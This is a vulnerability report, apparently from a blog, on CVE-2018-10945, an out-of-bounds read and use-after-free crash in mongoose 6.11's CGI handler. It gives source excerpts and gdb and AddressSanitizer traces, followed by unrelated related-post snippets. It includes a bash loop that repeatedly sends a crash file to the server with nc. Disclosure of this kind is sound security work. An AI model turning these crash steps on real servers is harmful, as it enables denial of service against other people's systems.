CVE-2018-10945 mongoose越界访问
Hello , I found a vulneratility in mg_handle_cgi function
The function is in mongoose.c , line 8925
8923 if (mg_start_process(opts->cgi_interpreter, prog, blk.buf, blk.vars, dir,
8924 fds[1]) != 0) {
8925 size_t n = nc->recv_mbuf.len - (hm->message.len - hm->body.len);
8926 struct mg_connection *cgi_nc =
8927 mg_add_sock(nc->mgr, fds[0], mg_cgi_ev_handler MG_UD_ARG(nc));
8928 struct mg_http_proto_data *cgi_pd = mg_http_get_proto_data(nc);
8929 cgi_pd->cgi.cgi_nc = cgi_nc;
8930 #if !MG_ENABLE_CALLBACK_USERDATA
8931 cgi_pd->cgi.cgi_nc->user_data = nc;
8932 #endif
8933 nc->flags |= MG_F_HTTP_CGI_PARSE_HEADERS;
8934 /* Push POST data to the CGI */
8935 if (n > 0 && n < nc->recv_mbuf.len) {
8936 mg_send(cgi_pd->cgi.cgi_nc, hm->body.p, n);
8937 }
note line 8925 , n is assigned by nc->recv_mbuf.len - (hm->message.len - hm->body.len) ,
when I debug it , I found that nc->recv_mbuf.len=1024 and hm->message.len - hm->body.len is a small number.
this may lead n > hm->body.len , This would lead program to read the memory out of the hm->body's memory.
And when I trigger this vulneratility many times (200+) , I got a null pointer dereference (uaf )
Normal Produce
The Steps to produce the vulneratility
Step 1
Download the latest source of mongoose , and compile the code in directory examples/simplest_web_server
Then run it
wget https://github.com/cesanta/mongoose/archive/6.11.zip
unzip 6.11.zip
cd mongoose-6.11/examples/simplest_web_server
make
./simplest_web_server
This would start a http server on port 8000
01:09 haclh@ubuntu:simplest_web_server $ ./simplest_web_server
Starting web server on port 8000
Step 2
Use nc to send payload to the 8000 port
nc 127.0.0.1 8000 < ~/vmdk_kernel/fuzz_workplace/crash.fuzz
PS: the crash.fuzz file will attach with the email
Then we can get Segmentation fault (core dumped)
Produce With gdb
If you want to produce the vulneratility in gdb, you should send many times (:may be 200+. payload to tigger crash
Step 1
Download and compile the source , and use gdb to start it.
01:27 haclh@ubuntu:simplest_web_server $ gdb ./simplest_web_server -q
Reading symbols from ./simplest_web_server...done.
(gdb) set follow-fork-mode parent
(gdb) r
Starting program: /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Starting web server on port 8000
ps: you should set follow-fork-mode parent
Step 2
Send the payload many times to the port
01:33 haclh@ubuntu:simplest_web_server $ cat cyc.sh
# !/bin/bash
for i in {1..1000}
do
nc 127.0.0.1 8000 < ~/vmdk_kernel/fuzz_workplace/crash.fuzz
echo $i
done
echo $i
01:33 haclh@ubuntu:simplest_web_server $ ./cyc.sh
I write a shell script to do this.
Then We can see gdb got the crash
01:27 haclh@ubuntu:simplest_web_server $ gdb ./simplest_web_server -q
Reading symbols from ./simplest_web_server...done.
(gdb) set follow-fork-mode parent
(gdb) r
Starting program: /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Starting web server on port 8000
Program received signal SIGSEGV, Segmentation fault.
0x00000000004087cf in mg_send (nc=0x6235a0, buf=0x623d10, len=68) at ../../mongoose.c:2635
2635 nc->iface->vtable->tcp_send(nc, buf, len);
(gdb) p nc->iface
$1 = (struct mg_iface *) 0x0
(gdb) p nc
$2 = (struct mg_connection *) 0x6235a0
(gdb) x/4xg 0x6235a0
0x6235a0: 0x00007ffff7bb4cc8 0x00007ffff7bb4cc8
0x6235b0: 0x0000000000000000 0x0000000000000000
(gdb) x/4xg 0x6235a0-0x10
0x623590: 0x0000000000000000 0x0000000000000161
0x6235a0: 0x00007ffff7bb4cc8 0x00007ffff7bb4cc8
(gdb) x/4xg 0x6235a0-0x10+0x160
0x6236f0: 0x0000000000000160 0x00000000000000e0
0x623700: 0x0000000000623b10 0x0000000000000000
(gdb)
we can see that nc->iface is 0x0, and the code want nc->iface->vtable->tcp_send , this lead null pointer dereference
If you know the gibc malloc , you can find that nc is freed
Produce With AddressSanitizer
And you can comile with clang and AddressSanitizer to get more detail information
clang -fsanitize=address simplest_web_server.c ../../mongoose.c -o simplest_web_server -g -W -Wall -Werror -I../.. -Wno-unused-function -DMG_DISABLE_DAV_AUTH -DMG_ENABLE_FAKE_DAVLOCK -pthread
then run it and send the payload to the server, you could get the log below it.
01:19 haclh@ubuntu:simplest_web_server $ ./simplest_web_server
# Starting web server on port 8000
==16867==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000980 at pc 0x0000004e653d bp 0x7fffb8bab790 sp 0x7fffb8baaf40
READ of size 876 at 0x619000000980 thread T0
# 0 0x4e653c in __asan_memcpy /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23
# 1 0x53b9d6 in mbuf_insert /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:1477:24
# 2 0x53bafc in mbuf_append /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:1490:10
# 3 0x550dc3 in mg_socket_if_tcp_send /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3356:3
# 4 0x546ffa in mg_send /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2635:5
# 5 0x582179 in mg_handle_cgi /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8936:7
# 6 0x56e5a5 in mg_send_http_file /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:7967:5
# 7 0x56adb7 in mg_serve_http /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8072:3
# 8 0x5219c7 in ev_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:11:5
# 9 0x544af8 in mg_call /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2241:5
# 10 0x55d475 in mg_http_call_endpoint_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:8426:3
# 11 0x55cdb3 in mg_http_handler /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:6245:7
# 12 0x544af8 in mg_call /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2241:5
# 13 0x5494e7 in mg_recv_common /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2689:3
# 14 0x548c38 in mg_if_recv_tcp_cb /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2693:3
# 15 0x5526ca in mg_handle_tcp_read /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3554:7
# 16 0x55196f in mg_mgr_handle_conn /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3679:9
# 17 0x55564b in mg_socket_if_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3877:5
# 18 0x546906 in mg_mgr_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2407:11
# 19 0x52191b in main /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:33:5
# 20 0x7f4cbf9a582f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
# 21 0x41ad68 in _start (/tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server+0x41ad68)
0x619000000980 is located 0 bytes to the right of 1024-byte region [0x619000000580,0x619000000980)
allocated by thread T0 here:
# 0 0x4e76f8 in __interceptor_malloc /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:88
# 1 0x552521 in mg_handle_tcp_read /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3518:24
# 2 0x55196f in mg_mgr_handle_conn /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3679:9
# 3 0x55564b in mg_socket_if_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:3877:5
# 4 0x546906 in mg_mgr_poll /tmp/t/mongoose-6.11/examples/simplest_web_server/../../mongoose.c:2407:11
# 5 0x52191b in main /tmp/t/mongoose-6.11/examples/simplest_web_server/simplest_web_server.c:33:5
# 6 0x7f4cbf9a582f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/haclh/vmdk_kernel/libfuzzer-workshop-master/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:23 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c327fff80e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff8130:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==16867==ABORTING
CVE-2018-10945 mongoose越界访问的更多相关文章
- new的越界访问
今天敲代码的时候发现了一个BUG和大家分享一下,希望大家下次不要犯和我一样的错误. 如果犯了和我一样的错,也能知道自己错在哪里! <(^-^)> 函数如下:(斐波那契数列的实现) lo ...
- linux 内核源代码情景分析——越界访问
页式存储管理机制通过页面目录和页面表将每个线性地址转换成物理地址,当遇到下面几种情况就会使CPU产生一次缺页中断,从而执行预定的页面异常处理程序: ① 相应的页面目录或页表项为空,也就是该线性地址与物 ...
- IOS上解决内存越界访问问题
IOS经常会混合使用C代码,而在C中,对内存的读写是很频繁的操作. 其中,内存越界读写 unsigned char* p =(unsigned char*)malloc(10); unsigned c ...
- 【转载】2018 hosts 持续更新访问 gu歌【更新于:2018-05-03】
修改HOSTS实现免费,简单访问谷歌的目的 也是比较稳定的方法.修改hosts.修改hosts的方法,原理在于直接存储谷歌网站的IP地址.这样就不用DNS来解析网址了.也就是说,当我们输入谷歌 ...
- Netatalk CVE-2018–1160 越界访问漏洞分析
编译安装 首先下载带有漏洞的源代码 https://sourceforge.net/projects/netatalk/files/netatalk/3.1.11/ 安装一些依赖库(可能不全,到时根据 ...
- CreateProcess Access violation(越界访问)
https://stackoverflow.com/questions/11339186/createprocess-fails-with-an-access-violation My aim is ...
- 【转帖】2018年Windows漏洞年度盘点
2018年Windows漏洞年度盘点丨老漏洞经久不衰,新0day层出不穷 腾讯电脑管家2019-02-12共17875人围观 ,发现 1 个不明物体网络安全资讯 https://www.freebuf ...
- [PHP] 2018年终总结
去掉敏感信息后的不完整版 ==========================================================================2018年12月29日 记 ...
- OpenCV(2)-Mat数据结构及访问Mat中像素
Mat数据结构 一开始OpenCV是基于C语言的,在比较早的教材例如<学习OpenCV>中,讲解的存储图像的数据结构还是IplImage,这样需要手动管理内存.现在存储图像的基本数据结构是 ...
随机推荐
- iOS9新特性-UIStackView
1. UIStackView相关属性理解 UIStackView是iOS9之后推出的,我也是第一次接触,在学习的过程中对于其中的相关属性,尤其是对其中的distribution几个属性值,一知半解的, ...
- 【转】linux下杀死进程(kill)的N种方法
转载一篇,最原始的出处已不可考,望见谅! 常规篇: 首先,用ps查看进程,方法如下: $ ps -ef ……smx 1822 1 0 11:38 ? 00:00:4 ...
- SQL命令导入导出
利用cmd的操作命令导出,详情如下(备注:方法二是转载网上的教程):1:G:\Oracle\product\10.1.0\Client_1\NETWORK\ADMIN目录下有个tnsname.ora文 ...
- [转]asp.net core中的View Component
解读ASP.NET 5 & MVC6系列(14):View Component http://www.cnblogs.com/TomXu/p/4496486.html
- [转载]7款开源ERP系统比较
现在有许多企业将ERP项目,在企 业中没有实施好,都归咎于软件产品不好.其实,这只是你们的借口.若想要将ERP软件真正与企业融合一体,首先得考虑企业的自身情况,再去选择适合的 ERP软件. 如果你的企 ...
- docker 容器启动后立马退出的解决方法
原因: 容器同时只能管理一个进程,如果这个进程结束了容器就退出了,但是不表示容器只能运行一个进程(其他进程可在后台运行),但是要使容器不退出必须要有一个进程在前台执行. 解决方案: 启动脚本最后一 ...
- Java跨语言调用,使用JNA访问Java外部接口
1. JNA简单介绍 先说JNI(Java Native Interface)吧,有过不同语言间通信经历的一般都知道,它允许Java代码和其他语言(尤其C/C++)写的代码进行交互,只要遵守调用约定即 ...
- 解决Nginx 504 Gateway Time-out问题
解决方案:在http里设置FastCGI相关参数,如: worker_processes 1; events { worker_connections 1024; } http { include m ...
- pthread和semaphore的简单应用以及四个典型的多线程问题
pthread和semaphore的简单应用以及四个典型的多线程问题 pthread常用函数简单介绍 创建线程 int pthread_create(pthread_t * thread, pt ...
- 小游戏专场:腾讯云Game-Tech技术沙龙上海站顺利落下帷幕
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由腾讯游戏云发表于云+社区专栏 9月14日腾讯云GAME-TECH技术沙龙小游戏专场在上海顺利举办,此次技术沙龙由腾讯云的资深专家,以及 ...